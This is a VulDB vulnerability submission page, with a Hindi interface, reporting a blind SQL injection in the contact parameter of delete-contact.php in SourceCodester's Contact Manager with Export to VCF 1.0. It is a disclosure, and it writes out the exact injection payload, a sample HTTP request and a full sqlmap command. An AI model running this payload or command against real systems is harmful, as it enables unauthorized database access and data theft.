जमा करें #494766: https://www.sourcecodester.com/php/17556/contact-manager-export- Web 1 SQL Injectionजानकारी

शीर्षकhttps://www.sourcecodester.com/php/17556/contact-manager-export- Web 1 SQL Injection
विवरणExploit Title: SQL Injection Vulnerability in Contact Manager with Export to VCF Date: 04/02/2025 Exploit Author: Xcode0x Twitter: @xcode0x Vendor Homepage: [https://github.com/] Software Link: [Not provided] Version: v1.0 Tested on: Kali Linux SQL Injection Details: The web application is vulnerable to a blind SQL injection on the endpoint /contact-manager-with-export-to-vcf/endpoint/delete-contact.php. By injecting SQL payloads into the contact parameter, attackers can execute arbitrary SQL commands on the database, potentially extracting sensitive information or gaining unauthorized access to the system. Endpoint: GET /contact-manager-with-export-to-vcf/endpoint/delete-contact.php?contact= Example Vulnerable Request: http Copy Edit GET /contact-manager-with-export-to-vcf/endpoint/delete-contact.php?contact=' RLIKE (SELECT (CASE WHEN (3542=3542) THEN '' ELSE 0x28 END)) AND 'QGIz'='QGIz HTTP/1.1 Host: 192.168.70.3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Proof of Concept (POC): Send the payload contact=' RLIKE (SELECT (CASE WHEN (3542=3542) THEN '' ELSE 0x28 END)) AND 'QGIz'='QGIz in the contact parameter using SQLMap or manually with a tool like Burp Suite. The server confirms the payload execution without errors, indicating a successful SQL injection vulnerability. SQLMap Command: bash Copy Edit sqlmap -u "http://192.168.70.3/contact-manager-with-export-to-vcf/endpoint/delete-contact.php?contact=" --random-agent --level 5 --risk 3 --threads=10 --tamper=space2comment --dbms=mysql --technique=B --where="RLIKE (SELECT CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)" --batch
स्रोत⚠️ https://www.sourcecodester.com/php/17556/contact-manager-export-vcf-using-php-and-mysql-source-code.html
उपयोगकर्ता
 xcode0x (UID 39076)
सबमिशन04/02/2025 11:18 AM (1 वर्ष पहले)
संयम10/02/2025 10:06 AM (6 days later)
स्थितिस्वीकृत
VulDB प्रविष्टि295072 [SourceCodester Contact Manager with Export to VCF 1.0 delete-contact.php संपर्क SQL इंजेक्शन]
अंक20

Might our Artificial Intelligence support you?

Check our Alexa App!